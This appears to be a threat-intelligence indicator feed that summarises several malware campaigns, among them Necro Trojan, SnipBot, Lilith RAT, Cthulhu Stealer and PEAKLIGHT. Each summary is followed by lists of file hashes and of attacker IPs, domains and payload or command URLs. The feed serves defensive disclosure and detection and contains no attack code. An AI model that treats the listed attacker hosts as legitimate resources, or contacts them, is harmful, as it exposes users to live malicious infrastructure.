FileHash-MD5	1f0b9aed4b2c8d958a9b396852a62c9d
FileHash-MD5	23d99f912f2491749b89e4fd337273bc
FileHash-MD5	242098c3e87822bffa7c337987065fbe
FileHash-MD5	244a4f81cff4a8dc5872628a40713735
FileHash-MD5	24c72ffef74be81c5a7d4cb024110328
FileHash-MD5	2cd569dafe4f537150f0416b021c30ab
FileHash-MD5	387fd14f5a89ec121c4c2c989063822f
FileHash-MD5	3c1b429685e5f1853a3cd955bd0acbd7
FileHash-MD5	4055d8b5c2e909f5db8b75a5750a7005
FileHash-MD5	473dfccda44f85d119aadefb92cd085e
FileHash-MD5	5d013b96a25f0610cd1ac45d61d44d7e
FileHash-MD5	5d61614099d6d567441d15c58d6517b0
FileHash-MD5	64fc017a451ef273dcacdf6c099031f3
FileHash-MD5	66fddebf896a5631172436b740c06ad1
FileHash-MD5	6bc591f4e8eb1ea54b4d6defd019bee8
FileHash-MD5	71ffc9ebbb80f4e2f405034662dfd424
FileHash-MD5	7aeb1fe9ab3efffcf390eadaff696411
FileHash-MD5	7ce27d43bdbb6c9238c5d367a86dc37b
FileHash-MD5	7ed44b36850a5f192fb56768669d8090
FileHash-MD5	809334c0b55009c5a50f37e4eec63c43
FileHash-MD5	83044ce990501559e34f5a64318778a8
FileHash-MD5	8b50f74907810cf23507b5bd8d83f13c
FileHash-MD5	8d2199fa11c6a8d95c1c2b4add70373a
FileHash-MD5	8e5ba70473c66334ced67ac3be9970e0
FileHash-MD5	93be13bbcad30440a0d0ef3868d67003
FileHash-MD5	960594cbdf938bcb03bd0637843d9154
FileHash-MD5	a2571577f281eda9548d9047b37cbbb8
FileHash-MD5	a85460ff7d12ccc2b82da8143ac1f594
FileHash-MD5	a8fce1e8e89053e143b5431cfa5209cb
FileHash-MD5	aaa9db79b5d6ba319e24e6180a7935d6
FileHash-MD5	aba760ec55fdeccb35adb068443feb89
FileHash-MD5	ad4ce3a58db27f40e17abf633e319efe
FileHash-MD5	b181ecbb7394e3b1394a8c97af65b7e2
FileHash-MD5	b9cff91be734e2a071d3b0fc07dc8386
FileHash-MD5	c381c2cb8fdd6acf1636280b9424f573
FileHash-MD5	c4a88707bba871a667004a4a27de6785
FileHash-MD5	c5a737a346e0a83082b924712926af7d
FileHash-MD5	c67d578a14571e4f56430ce4bdc228f9
FileHash-MD5	cdeb7abfc7775c63745135431272dda3
FileHash-MD5	d16bb327c655ac5e52c9452cedb369da
FileHash-MD5	d1b4ca2933f49494b4400d5bf5ab502e
FileHash-MD5	dd247ccd7cc3a13e1c72bb01cf3a816d
FileHash-MD5	de578308ac3403ae9e88616b8a292383
FileHash-MD5	e8e84ac1ae83a45c260df146e97cb1cb
FileHash-MD5	e8f3ecc0456fcbbb029b1c27dc1faad0
FileHash-MD5	eb0bba584138044e2d051deab69a57f1
FileHash-MD5	ef6ec560efd05d21976a6fd3f489e206
FileHash-MD5	f1c935ce028022ab2a495eae83adacc6
FileHash-MD5	fa55d4fe55eb4b9b34804d94bcd2f88f
FileHash-MD5	fa6d5164772ba72dc3931dae8e09b488
FileHash-SHA1	03188d5ee44005b1b0e2ed62c943cd8571ab8ee2
FileHash-SHA1	0467a0dd4f9e92d54e3d059aed49f282f2ccf40e
FileHash-SHA1	09a73164c70426372b431cba80510037eb42feb9
FileHash-SHA1	0f5c2ebbf2edc7d25ea72437b5f5b2245fcffacf
FileHash-SHA1	0fc0e1ab30f55d1709532496ac6adac107a4729e
FileHash-SHA1	116646a11967c1eed0e6072150b8d581bcf8d6a5
FileHash-SHA1	11b14763023772cc2eebfa306aef0c9e946b491b
FileHash-SHA1	18a6ee322f30fe17f896686fbc162e4c8d628e5a
FileHash-SHA1	1dd0301a120d6cbed1d22b9d1fb8c9d3d6793546
FileHash-SHA1	21966155675a407ba199561cf245e9e2858026bf
FileHash-SHA1	2319cbf50ff858b66aa36b27a78ac7ef89a6d17a
FileHash-SHA1	24b60847bc0712c9ba0b8036c59ee16c211fa8bb
FileHash-SHA1	2f7056621e1a8ecb20a7639635d403e2c44e6135
FileHash-SHA1	3cf40758a15faf5037a7fcb6c8d6c322ec54dfc1
FileHash-SHA1	3e6f2c6ef018528dc65b97331f3ce745b3c386a0
FileHash-SHA1	41f2e6fe3a26cfad586fa4c7682d0a815567a1a4
FileHash-SHA1	4d26a7a2a3b6900050dba6058b2797bfa1ce1102
FileHash-SHA1	53ce7a2850e27465f3aae3cc2fae1a3ec1b6a640
FileHash-SHA1	69f68529e07f2463eb105cfc87df04539e969a56
FileHash-SHA1	6aa8b4f4a6fd1b4f768b1ac6faaaddbaa302a585
FileHash-SHA1	6fb8b0e4e31f678f53b22e7b8a1b70f0deef1545
FileHash-SHA1	707c251833db0fb7c17c79413ddaebcb54cdb0fc
FileHash-SHA1	71093d587278185fd831783acb2a97444ad661d8
FileHash-SHA1	77430cca36ee983dc17ca47efe9faa608effcef8
FileHash-SHA1	7918e2c9c6f2847078bb736968f8f21b7e70a0af
FileHash-SHA1	8103cbffd4f7651c32a1cc602f0398027fb3207f
FileHash-SHA1	81c06183b1bb146f5f1a5f1d03ac44fa9d68d341
FileHash-SHA1	81caea574f890dd6d25a95d04ae6e2d4ff7222d7
FileHash-SHA1	94feda1c4059291a7e00fbe5435291017caf55fc
FileHash-SHA1	9543cab61c330e533bcdd92ed6e1012f1b284d10
FileHash-SHA1	a65d4b46ba7fcb3b023f61303e65f0c494b63386
FileHash-SHA1	a76b7579c217ce45f9c257b4a3617cfcd63c3212
FileHash-SHA1	b7522d2f1fb7b9b92348b4d88c62480683d3485c
FileHash-SHA1	b9a0277465cc427191942fb0e9ae76c83ba84d3e
FileHash-SHA1	bb8647eeaf1acadbb2aa7d67222d4ab8054ac645
FileHash-SHA1	bdc8c0a03b3430af66895b5c6f03da00916447ca
FileHash-SHA1	c4f00531020b8f7cc865fe26c6e31e358e666831
FileHash-SHA1	c58370b4114d4d493e141a66cd1484573ccf02b5
FileHash-SHA1	cc7afffdb88729a5e977fa8f75a898d09624f54a
FileHash-SHA1	cf8ad0da6dc45ae7ce87f792b1e60175cefc2b50
FileHash-SHA1	d005ebee72feb5ac50ee81e872665cae32d6c1c9
FileHash-SHA1	dfe1f455adf8a98d94c7217acc763770ada4b4af
FileHash-SHA1	f228e772a31b4fc160cb59cf5627224613f10941
FileHash-SHA1	ff69b5e96a83f4f5657a087649882ec8b5ba09d2
FileHash-SHA256	0187db1c61f146d49f74fb7db1dccec1e42ad7d431bffbfcaeec910af1a4bc68
FileHash-SHA256	09e09503962a2a8022859e72b86ad8c69dcbf79839b71897c0bf8a4c4b9f4dd6
FileHash-SHA256	14c270cf53a50867e42120250abca863675d37abf39d60689e58288a9e870144
FileHash-SHA256	165a80f6856487b3b4f41225ac60eed99c3d603f5a35febab8235757a273d1fd
FileHash-SHA256	2722e289767ae391e3c3773b8640a8b9f6eb24c6a9d6e541f29c8765f7a8944b
FileHash-SHA256	28fadc26a2bee907fbdbf1aaebac6c7e6f8aa95e8c312cd659d19b82d1dfa70e
FileHash-SHA256	2ae6c5c2b71361f71ded4ad90bbf6ef0b0f4778caf54078c928e2017302fbe69
FileHash-SHA256	31a35e3b87a7f81449d6f3e195dc0660b5dae4ac5b7cd9a65a449526e8fb7535
FileHash-SHA256	39da7cc7c627ea4c46f75bcec79e5669236e6b43657dcad099e1b9214527670e
FileHash-SHA256	3e4e179a7a6718eedf36608bd7130b62a5a464ac301a211c3c8e37c7e4b0b32b
FileHash-SHA256	3f9db7bf1c9d897d46f669854e7ecc945778024f04cac9cd1585140d0d73a34f
FileHash-SHA256	4b41b605ffc0e31bd9d460d5a296ac6e8cfd56a215dc131e90ec2654f0ffe31b
FileHash-SHA256	4f839eac8204930ecc21a35476069daabbd40c14ef5af4db0e66de9b6a2e62fb
FileHash-SHA256	5bfb635c43eb73f25f4e75961a715b96fa764bbe096086fc1e037a7869c7878b
FileHash-SHA256	5e2642f33115c3505bb1d83b137e7f2b18e141930975636e6230cdd4292990dd
FileHash-SHA256	638c7a4f833dc95dbab5f0a81ef03b7d83704e30b5cdc630702475cc9fff86a2
FileHash-SHA256	65667d0b1710636d4b2030a25f64d0f960d75ebfc3f5ad92f03f78293b47ed75
FileHash-SHA256	70cab18770795ea23e15851fa49be03314dc081fc44cdf76e8f0c9b889515c1b
FileHash-SHA256	77505dcec5d67cc0f6eb841f50da7e7c41a69419d50dc6ce17fffc48387452e1
FileHash-SHA256	7e6a5e32596b99f45ea9099a14507a82c10a460c56585499d7cd640f2625567f
FileHash-SHA256	7e7292b5029882602fe31f15e25b5c59e01277abaab86b29843ded4aa0dcbdd1
FileHash-SHA256	85103955e35a1355ce68a92eaedd8f9376de1927d95bf12657b348dea6a8077b
FileHash-SHA256	887c09e24923258e2e2c28f369fba3e44e52ce8a603fa3aee8c3fb0f1ca660e1
FileHash-SHA256	8bee2012e1f79d882ae635a82b65f88eaf053498a6b268c594b0d7d601b1212f
FileHash-SHA256	9a33655007a4fddf9c434d84fafe205479aaa3f5eaf7425e14beb83e46fa7041
FileHash-SHA256	9a785f508890d250ab9e3a43f974a89f3311ebd0e85ec98b46c76bdb7bef7cfb
FileHash-SHA256	9b345d2d9f52cda989a0780acadf45350b423957fb7b7668b9193afca3e0cd27
FileHash-SHA256	a6b1de8184a7e560cea461b0e05d4136d0068b35c12c0889c4036d177e331a83
FileHash-SHA256	b2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf
FileHash-SHA256	bab601635aafeae5fbfe1c1f7204de17b189b345efd91c46001f6d83efbb3c5a
FileHash-SHA256	c6128f222f844e699760e32695d405bd5931635ec38ae50eddc17a0976ccefb4
FileHash-SHA256	cc8be1d525853403f6cfabcf0fc3bd0ca398ece559388102a7fc55e9f3aa9b33
FileHash-SHA256	d550f0f9c4554e63b6e6d0a95a20a16abe44fa6f0de62b6615b5fdcdb82fe8e1
FileHash-SHA256	d65d80ab0ccdc7ff0a72e71104de2b4c289c02348816dce9996ba3e2a4c1dd62
FileHash-SHA256	dd2675e2f6835f8a8a0e65e9dbc763ca9229b55af7d212da38b949051ae296a5
FileHash-SHA256	dedc593acc72c352feef4cc2b051001bfe22a79a3a7852f0daf95e2d10e58b84
FileHash-SHA256	ec553e14b84ccca9b84e96a9ed19188a1ba5f4bf1ca278ab88f928f0b00b9bd0
FileHash-SHA256	f17f6866f4748e6e762752062acdf983d3b083371db83503686b91512b9bcae3
FileHash-SHA256	f511bdd471096fc81dc8dad6806624a73837710f99b76b69c6501cb90e37c311
FileHash-SHA256	f664670044dbd967ff9a5d8d8f345be294053e0bae80886cc275f105d8e7a376
FileHash-SHA256	f865531608a4150ea5d77ef3dd148209881fc8d831b2cfb8ca95ceb5868e1393
FileHash-SHA256	fb02e97d52a00fca1580ca71ed152dd28dd5ae28ab0a9c8e7b32cebd7f1998a1
FileHash-SHA256	ff2ae62ba88e7068fa142bbe67d7b9398e8ae737a43cf36ace1fcf809776c909
FileHash-SHA256	ffbe988fd797cbb9a1eedb705cf00ebc8277cdbd9a21b6efb40a8bc22c7a43f0
IPv4	146.70.149.61
IPv4	178.32.30.3
IPv4	193.109.120.59
IPv4	51.254.25.36
IPv4	51.255.19.178

Necro Trojan infiltrates Google Play and Spotify and WhatsApp mods

A new version of the Necro Trojan has infected various popular applications, including game mods and apps on Google Play, potentially affecting over 11 million Android devices. The multi-stage loader uses steganography to hide payloads and obfuscation to evade detection. Its modular architecture allows for targeted delivery of updates or new malicious modules. The Trojan can display ads, download and execute arbitrary files, install applications, open links in invisible windows, run tunnels through victim devices, and potentially subscribe to paid services. Infected apps include Wuta Camera, Max Browser, and modified versions of Spotify, WhatsApp, and games like Minecraft.

Type	Indicator
IPv4	47.88.3.73
FileHash-MD5	0898d1a6232699c7ee03dd5e58727ede
FileHash-MD5	1590d5d62a4d97f0b12b5899b9147aea
FileHash-MD5	1cab7668817f6401eb094a6c8488a90c
FileHash-MD5	1eaf43be379927e050126e5a7287eb98
FileHash-MD5	247a0c5ca630b960d51e4524efb16051
FileHash-MD5	28b8d997d268588125a1be32c91e2b92
FileHash-MD5	30d69aae0bdda56d426759125a59ec23
FileHash-MD5	36ab434c54cce25d301f2a6f55241205
FileHash-MD5	37404ff6ac229486a1de4b526dd9d9b6
FileHash-MD5	4c2bdfcc0791080d51ca82630213444d
FileHash-MD5	4e9bf3e8173a6f3301ae97a3b728f6f1
FileHash-MD5	522d2e2adedc3eb11eb9c4b864ca0c7f
FileHash-MD5	52a2841c95cfc26887c5c06a29304c84
FileHash-MD5	59b44645181f4f0d008c3d6520a9f6f3
FileHash-MD5	874418d3d1a761875ebc0f60f9573746
FileHash-MD5	acb7a06803e6de85986ac49e9c9f69f1
FileHash-MD5	b3ba3749237793d2c06eaaf5263533f2
FileHash-MD5	b69a83a7857e57ba521b1499a0132336
FileHash-MD5	ccde06a19ef586e0124b120db9bf802e
FileHash-MD5	ed6c6924201bc779d45f35ccf2e463bb
FileHash-MD5	f338384c5b4bc7d55681a3532273b4eb
FileHash-MD5	fa217ca023cda4f063399107f20bd123
FileHash-SHA1	7d1a369050b3bcb2274ee3580c08d1dc36afff13
FileHash-SHA256	2001dcbde6310fd03413d7936475d50e8bbafc6bd3c62ae637af2039cb74fff1
IPv4	47.88.190.200
IPv4	47.88.245.162
IPv4	47.88.246.111
hostname	hsa.govsred.buzz

Inside SnipBot: The Latest RomCom Malware Variant

A novel version of the RomCom malware family called SnipBot has been discovered, revealing post-infection activity from attackers on victim systems. This new strain employs new tricks and unique code obfuscation methods beyond those seen in previous RomCom versions. The infection chain begins with a downloader disguised as a PDF, followed by multiple stages including DLLs injected into explorer.exe. SnipBot provides backdoor capabilities allowing command execution, file exfiltration, and additional payload downloads. Analysis of attacker post-infection activity shows attempts to gather network information, exfiltrate files, and explore Active Directory. The malware authors appear experienced but not elite, with some minor code flaws present. SnipBot has evolved from earlier RomCom versions, with samples dating back to December 2023.

Type	Indicator
IPv4	23.137.249.182
IPv4	23.184.48.90
FileHash-MD5	7f2e4a44445b977ef8917cc0fb79035b
FileHash-MD5	c0e499402acb6c302228b4a7923d5db6
FileHash-SHA1	983332a5660ec6c28123e745023b41105775ab6f
FileHash-SHA1	cb3d3a7e39e7cdc8501ae0eff77d02a1c995bc31
FileHash-SHA256	0be3116a3edc063283f3693591c388eec67801cdd140a90c4270679e01677501
FileHash-SHA256	1cb4ff70f69c988196052eaacf438b1d453bbfb08392e1db3df97c82ed35c154
FileHash-SHA256	2c327087b063e89c376fd84d48af7b855e686936765876da2433485d496cb3a4
FileHash-SHA256	5390ba094cf556f9d7bbb00f90c9ca9e04044847c3293d6e468cb0aaeb688129
FileHash-SHA256	57e59b156a3ff2a3333075baef684f49c63069d296b3b036ced9ed781fd42312
FileHash-SHA256	5b30a5b71ef795e07c91b7a43b3c1113894a82ddffc212a2fa71eebc078f5118
FileHash-SHA256	5c71601717bed14da74980ad554ad35d751691b2510653223c699e1f006195b8
FileHash-SHA256	60d96087c35dadca805b9f0ad1e53b414bcd3341d25d36e0190f1b2bbfd66315
FileHash-SHA256	92c8b63b2dd31cf3ac6512f0da60dabd0ce179023ab68b8838e7dc16ef7e363d
FileHash-SHA256	a2f2e88a5e2a3d81f4b130a2f93fb60b3de34550a7332895a084099d99a3d436
FileHash-SHA256	b9677c50b20a1ed951962edcb593cce5f1ed9c742bc7bff827a6fc420202b045
FileHash-SHA256	cfb1e3cc05d575b86db6c85267a52d8f1e6785b106797319a72dd6d19b4dc317
FileHash-SHA256	e5812860a92edca97a2a04a3151d1247c066ed29ae6bbcf327d713fbad7e79e8
FileHash-SHA256	f74ebf0506dc3aebc9ba6ca1e7460d9d84543d7dadb5e9912b86b843e8a5b671
IPv4	185.225.74.94
IPv4	212.46.38.222
IPv4	23.137.248.220
IPv4	23.137.249.14
IPv4	38.180.5.251
IPv4	79.141.170.34
IPv4	91.92.242.87
IPv4	91.92.250.104
IPv4	91.92.250.106
IPv4	91.92.250.240
IPv4	91.92.254.234
IPv4	91.92.254.54
domain	cloudcreative.digital
domain	dns-msn.com
domain	drvmcprotect.com
domain	fastshare.click
domain	ilogicflow.com
domain	mcprotect.cloud
domain	publicshare.link
domain	sitepanel.top
hostname	1drv.fileshare.direct
hostname	adobe.cloudcreative.digital

From initial compromise to ransomware and wipers

The Twelve group, formed in April 2023 amid the Russian-Ukrainian conflict, specializes in attacking Russian government organizations. Their attacks involve encrypting and deleting victims' data, causing maximum damage without seeking financial gain. The group uses publicly available tools like Cobalt Strike, mimikatz, and PowerShell scripts for initial access, lateral movement, and privilege escalation. They employ LockBit 3.0 ransomware and Shamoon-based wipers to destroy infrastructures. Twelve exfiltrates sensitive data and posts it on Telegram. The group shares infrastructure with DARKSTAR, suggesting a possible syndicate. Their primary objectives are to destroy critical assets, disrupt business, steal sensitive data, and discredit victims.

Type	Indicator
IPv4	5.8.16.148
IPv4	5.8.16.169
IPv4	212.109.217.88
IPv4	79.137.69.34
IPv4	89.238.132.68
IPv4	89.33.8.198
IPv4	91.90.121.220
CVE	CVE-2021-21972
CVE	CVE-2021-22005
FileHash-MD5	05d80c987737e509ba8e6c086df95f7d
FileHash-MD5	31014add3cb96eee557964784bcf8fde
FileHash-MD5	39b91f5dfbbec13a3ec7cce670cf69ad
FileHash-MD5	43b3520d69dea9b0a27cce43c1608cad
FileHash-MD5	48b2e5c49f121d257b35ba599a6cd350
FileHash-MD5	4bff90a6f7bafc8e719e8cab87ab1766
FileHash-MD5	5c46f361090620bfdcac6afce1150fae
FileHash-MD5	5dcd02bda663342b5ddea2187190c425
FileHash-MD5	646a228c774409c285c256a8faa49bde
FileHash-MD5	72830102884c5ebccf2afbd8d9a9ed5d
FileHash-MD5	7a7c0a521b7596318c7cd86582937d98
FileHash-MD5	7bec3c59d412f6f394a290f95975e21f
FileHash-MD5	7dfa50490afe4553fa6889bdafda7da2
FileHash-MD5	97aac7a2f0d2f4bdfcb0e8827a111524
FileHash-MD5	9bd78bcf75b9011f9d7a9a6e5aee5bf6
FileHash-MD5	9c74401a28bd71a87cdf5c17ad1dffa5
FileHash-MD5	d813f5d37ab2feed9d6a2b7d4d5b0461
FileHash-MD5	dad076c784d9fcbc506c1e614aa27f1c
FileHash-MD5	e930b05efe23891d19bc354a4209be3e
FileHash-MD5	ecb14e506727ee67220e87ced2e6781a
FileHash-MD5	f8da1f02aa64e844770e447709cdf679
FileHash-MD5	f90e95b9fcab4c1b08ca06bc2c2d6e40
FileHash-SHA1	12df98ea1706186be41d8a9f7067bfc7ae0b1fba
FileHash-SHA1	3fb65bff6f6d49eb46e2699d567fcabd241074a2
FileHash-SHA1	4991ae0805909b777d554e9521b45760492a5d7d
FileHash-SHA1	d1f7832035c3e8a73cc78afd28cfd7f4cece6d20
FileHash-SHA256	4a4c8d32038388f6ca9475fb6db8024acd56a01721d53104c755f918fb31f221
FileHash-SHA256	773f9b531c8d59a32aad6f7f50e4a22c6e5642d4e70eed0a12390caf66eb8403
FileHash-SHA256	92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50
FileHash-SHA256	a028fe94a83846666ec974858398dbdcfd6fdd29bd995619a1f2542f611d62d6
IPv4	109.205.56.229
IPv4	193.110.79.47
IPv4	195.2.79.195
IPv4	217.148.143.196
IPv4	5.8.16.147
IPv4	5.8.16.149
IPv4	5.8.16.170
IPv4	5.8.16.236
IPv4	5.8.16.238

Threat Tracking: Analysis of Lilith RAT ported to AutoIt Script

In April 2024, S2W's Threat Research and Intelligence Center TALON analyzed a malicious LNK file disguised as a list of tax evasion explanatory documents. The LNK file executed a PowerShell command to download and run an AutoIt script-based Lilith RAT malware from an attacker's server, which establishes a reverse shell on the infected system. Similarities between this campaign and KONNI group's tactics, such as command obfuscation and the use of AutoIt-ported malware, suggest the threat actor behind this attack could be linked to KONNI.

Type	Indicator
FileHash-MD5	19dc387bffdc0a22f640bd38af320db4
FileHash-MD5	3334d2605c0df26536058f73a43cb074
FileHash-MD5	3c81dc763a4f003ba6e33cd5b63068cd
FileHash-MD5	4f865db4192afb5bbcdeb2e899ca97a4
FileHash-MD5	5613ba2032bc1528991b583e17bad59a
FileHash-MD5	6d6433c328f6cdce4a80efce3a29ea3e
FileHash-MD5	6f5e4b45ca0d8c1128d27a15421eea38
FileHash-MD5	7bb236041b91d4cd4fa129267cf109c3
FileHash-MD5	9d6c79c0b395cceb83662aa3f7ed0123
FileHash-MD5	a0483db3725f8a50078daee7fd10f9bb
FileHash-MD5	c56b5f0201a3b3de53e561fe76912bfd
FileHash-MD5	d357fc478765a22f403c699a812f29bd
FileHash-MD5	d5809e5f848f228634aa45ffe4a5ece0
FileHash-SHA1	1a8d8aa268d0475408f8a10c96d4cfee5e122011
FileHash-SHA1	2a4062e10a5de813f5688221dbeb3f3ff33eb417
FileHash-SHA1	5ca50ceacfb31cbb04d6820e4021d911fcd8a60b
FileHash-SHA256	0329bb5b3a450b0a8f148a57e045bf6ed40eb49a62e026bd71b021a2efc40aed
FileHash-SHA256	2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
FileHash-SHA256	237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
FileHash-SHA256	5bcfb56c4c884e3657bbfeacca37853113d640b77dff9af519c08c4b64ca029d
FileHash-SHA256	5ea09247ad85915a8d1066d1825061cc8348e14c4e060e1eba840d5e56ab3e4d
FileHash-SHA256	778e46f8f3641a92d34da68dffc168fdc936841c5ad3d8b44da62a7b2dfe2ee1
FileHash-SHA256	77d05cc623f860ca2e6d47cdafc517aa0612de88291de7f2a3d95c5d04f1658a
FileHash-SHA256	7c08b9178c05ab765a3d7754ac99f4ba1abddb226dbb6cc898bc692bba1898a1
FileHash-SHA256	808425bc599cd60989c90978d179af1d4c72dd7abfe5e0518aca44b48af15725
FileHash-SHA256	9e1a3653029b5378736ea1debba44cd81988de73b6d8689f9eba792e719da79a
FileHash-SHA256	ba59f1ece68fa051400fd46467b0dc0a5294b8644c107646e75d225a45fff015
FileHash-SHA256	c2cc785857c64fa1f8fbb2e359a2638f187cd77cd29ca6701e38d750e822faa4
FileHash-SHA256	e63082cf4db94f06d583a6313e48353366b44ce07b7ffceacc5bc4db88bd8810
URL	http://185.231.154.22:52720
URL	http://62.113.118.157:57860
URL	http://93.183.93.185:57860
domain	bgfile.com
domain	downwarding.com
domain	jethropc.com
domain	mq734121.info
domain	oryzanine.com
domain	phasechangesolutions.com
domain	radionaranjalstereo.com
domain	serviceset.net
domain	sibbss.com
domain	storkse.com
domain	ttzcloud.com
domain	werxtracts.com
hostname	file.drive002.com
hostname	www.cammirando.com

From the Depths: Analyzing the Cthulhu Stealer Malware for macOS

This report analyzes Cthulhu Stealer, a malware-as-a-service targeting macOS users to steal credentials and cryptocurrency wallets. It explores the malware's functionality, including prompting users for passwords, dumping keychain data, and exfiltrating stolen information. The analysis compares Cthulhu Stealer to Atomic Stealer, another macOS malware with similar capabilities, and provides insights into the malware's operators and distribution methods via underground forums.

Type	Indicator
FileHash-MD5	897384f9a792674b969388891653bb58
FileHash-SHA256	6483094f7784c424891644a85d5535688c8969666e16a194d397dc66779b0b12
FileHash-SHA256	96f80fef3323e5bc0ce067cd7a93b9739174e29f786b09357125550a033b0288
FileHash-SHA256	de33b7fb6f3d77101f81822c58540c87bd7323896913130268b9ce24f8c61e24
FileHash-SHA256	e3f1e91de8af95cd56ec95737669c3512f90cecbc6696579ae2be349e30327a7
FileHash-SHA256	f79b7cbc653696af0dbd867c0a5d47698bcfc05f63b665ad48018d2610b7e97b
URL	http://89.208.103.185
URL	http://89.208.103.185:4000/autocheckbytes
URL	http://89.208.103.185:4000/notification_archive

Decoding the Stealthy Memory-Only Malware

This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloader script, PEAKLIGHT, responsible for retrieving additional payloads from a content delivery network. The report examines different variations of PEAKLIGHT and the malware it delivers, including LUMMAC.V2, SHADOWLADDER, and CRYPTBOT. The analysis highlights the obfuscation techniques employed by the threat actors, such as system binary proxy execution and CDN abuse.

Type	Indicator
FileHash-MD5	c047ae13fc1e25bc494b17ca10aa179e
FileHash-SHA1	e293c7815c0eb8fbc44d60a3e9b27bd91b44b522
FileHash-SHA256	6c30c8a2e827f48fcfc934dd34fb2cb10acb8747fd11faae085d8ad352c01fbf
FileHash-MD5	059d94e8944eca4056e92d60f7044f14
FileHash-MD5	236c709bbcb92aa30b7e67705ef7f55a
FileHash-MD5	307f40ebc6d8a207455c96d34759f1f3
FileHash-MD5	43939986a671821203bf9b6ba52a51b4
FileHash-MD5	47eee41b822d953c47434377006e01fe
FileHash-MD5	58c4ba9385139785e9700898cb097538
FileHash-MD5	62f20122a70c0f86a98ff14e84bcc999
FileHash-MD5	91423dd4f34f759aaf82aa73fa202120
FileHash-MD5	95361f5f264e58d6ca4538e7b436ab67
FileHash-MD5	a6c4d2072961e9a8c98712c46be588f8
FileHash-MD5	b15bac961f62448c872e1dc6d3931016
FileHash-MD5	b6b8164feca728db02e6b636162a2960
FileHash-MD5	b716a1d24c05c6adee11ca7388b728d3
FileHash-MD5	bb9641e3035ae8c0ab6117ecc82b65a1
FileHash-MD5	c56b5f0201a3b3de53e561fe76912bfd
FileHash-MD5	d6ea5dcdb2f88a65399f87809f43f83c
FileHash-MD5	d7aff07e7cd20a5419f2411f6330f530
FileHash-MD5	d8e21ac76b228ec144217d1e85df2693
FileHash-MD5	dfdc331e575dae6660d6ed3c03d214bd
FileHash-MD5	e7c43dc3ec4360374043b872f934ec9e
FileHash-MD5	f98e0d9599d40ed032ff16de242987ca
FileHash-SHA1	1dcb61babb08fe5db711e379cb67335357a5db82
FileHash-SHA1	2a4062e10a5de813f5688221dbeb3f3ff33eb417
FileHash-SHA1	46a491abbbb434b6a1a2a1b1a793d24acd1d6c4b
FileHash-SHA256	237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
FileHash-SHA256	9fa7cacb5730faacc2b17d735c45ee1370130d863c3366d08ec013afe648bfa6
FileHash-SHA256	bf1a0c67b433f52ebd304553f022baa34bfbca258c932d2b4b8b956b1467bfa5
URL	http://62.133.61.56/Downloads
URL	http://62.133.61.56/Downloads/Full
URL	http://62.133.61.56/Downloads/Full%20Video%20HD%20
URL	http://gceight8vt.top/upload.php
URL	https://brewdogebar.com/code.vue
URL	https://forikabrof.click/flkhfaiouwrqkhfasdrhfsa.png
domain	brewdogebar.com
domain	considerrycurrentyws.shop
domain	deprivedrinkyfaiir.shop
domain	detailbaconroollyws.shop
domain	forikabrof.click
domain	gceight8vt.top
domain	horsedwollfedrwos.shop
domain	messtimetabledkolvk.shop
domain	patternapplauderw.shop
domain	relaxtionflouwerwi.shop
domain	tropicalironexpressiw.shop
domain	understanndtytonyguw.shop

Report on Ukraine government attack campaign

Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfuscated PowerShell script designed to install the SPECTR malware and the new FIRMACHAGENT program. These components enabled data theft, document exfiltration, screenshot capturing, and browser data theft, while scheduled tasks managed the malware components. Reducing the attack surface by limiting user privileges and implementing application whitelisting policies can mitigate this threat.

Type	Indicator
FileHash-MD5	2972616c870bffdb1978b487df290dfe
FileHash-MD5	4dd66548c1022822cf8247ca615ceea9
FileHash-MD5	522c2988dd63e162503c41dc87d631f6
FileHash-MD5	580a05ffdb0f3d5d703ccb2bcf04f9b7
FileHash-MD5	65e5f73193f87e233244479859a00fd1
FileHash-MD5	7d439f13a55f082fd674875f898197d7
FileHash-MD5	7dc1016e78f8c243b3b0fa59eb648567
FileHash-MD5	a3c977578212134897a864795e769a8d
FileHash-MD5	a9261e37a5a2fadbf58c71f15f48ad18
FileHash-MD5	a973224da0ebfca023ab3e55913447a9
FileHash-MD5	b58e45c4707b88dc1e89fd58359bfd5b
FileHash-MD5	b99d5bfcdf9535f094204137ab064c96
FileHash-MD5	d657fa0c86523d0376cc0c988c6c9e11
FileHash-MD5	e2c25142f08cd8f9c6f87266c7ffb829
FileHash-MD5	e5b69e06a2452914250e34be1de4ae6a
FileHash-MD5	ef123bc71a5f0e323b6a5c809d17d048
FileHash-MD5	f6b21151b924a31b936d3b299c0129b7
FileHash-MD5	f8efa529dff81b0e02a786fc766ffca3
FileHash-SHA256	087158ad28080ef438047b88896dfa1962d1cd6fed8fce06e35c25f91ad5f1ff
FileHash-SHA256	180f9a2d3de0b5f031408797286837bb4b10b2a6d8797cf985347f5d80f9e4a0
FileHash-SHA256	21c33c8365218b7fb1bbb0d45af77926877fb33384ef58fbbb6db04b9df55eb6
FileHash-SHA256	3e6c13f9e4cee9b8d55d7a83fd3c3d5d6d09b6c477c4f84fd79db6cc8de7ea42
FileHash-SHA256	4d8918cfcc97ca63666937e5d53373793f3695a2b1177e27a78aa34303c2ee80
FileHash-SHA256	68fe595237eec1261184a5f3a00cc0f678a33751615796942001997575887557
FileHash-SHA256	6a18392e3e062ce0fcd4688c0b09e482855cf709eb178437d8fe2cdc9cfdf51f
FileHash-SHA256	8612668466f9c8a180e0e9a3c92c85a03788f2f0bb3c6bf70f52c356e02702db
FileHash-SHA256	8987952745a8d46a8f2e6d1666cc9c542b6a9a96787ef467c76b779a8b6c1a66
FileHash-SHA256	8d4808ed167ac91724e8ab4da24bcc3bd2159a4972c212a1cd4062f02a3731d0
FileHash-SHA256	ad30e29ba883c3f528d2782dbc3d1b5258815b619c6dfc3639fee416cf27fb1f
FileHash-SHA256	b95ef984bfb22c55881931b134deaf1b848fbfda4180fc393b9f532f51089cbb
